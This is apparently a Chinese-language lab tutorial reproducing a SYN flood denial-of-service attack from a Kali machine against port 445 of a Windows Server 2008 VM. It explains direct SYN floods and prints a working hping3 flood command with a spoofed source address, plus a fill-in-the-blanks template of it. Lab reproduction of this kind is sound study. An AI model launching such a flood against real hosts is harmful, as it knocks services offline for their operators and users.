SYN Flood 的攻击复现(对445端口进行攻击)
前言
直接攻击
直接攻击IP地址不被欺骗的SYN Flood被称为直接攻击。在这次攻击中,攻击者根本不掩盖其IP地址。由于攻击者使用具有真实IP地址的单个源设备来创建攻击,因此攻击者极易受到发现和缓解的影响。为了在目标机器上创建半开状态,黑客可以防止其机器响应服务器的SYN-ACK数据包。这通常是通过阻止除SYN数据包之外的传出数据包的防火墙规则来实现的,或者在到达恶意用户机器之前过滤任何传入的SYN-ACK数据包。实际上,这种方法很少使用(如果有的话),因为减轻是非常简单的 – 只是阻止每个恶意系统的IP地址。
1、攻击前的准备
攻击机:kali (172.16.129.46)
靶机:winserver 2008(172.16.129.175)
确保两者能够互相ping通(就是要处于同一个网段之下)
注意:如果修改了,就要重新启动虚拟机方可生效
ping一下,验证成功
2、开始攻击
2.1、打开kali(攻击机)和windowsever2008(目标靶机)
2.2 先打开windows server2008的命令管理器
2.3然后发起攻击
输入
hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445 --flood 172.16.129.175
hping3 -q -n -a 伪造源IP -S -s 伪造源端口 --keep -p 目的端口 --flood 目的IP
等待一段时间后,ctrl+c 取消攻击
由于攻击过程卡住无法截图,停止攻击后可以观察:
windows server2008的命令管理器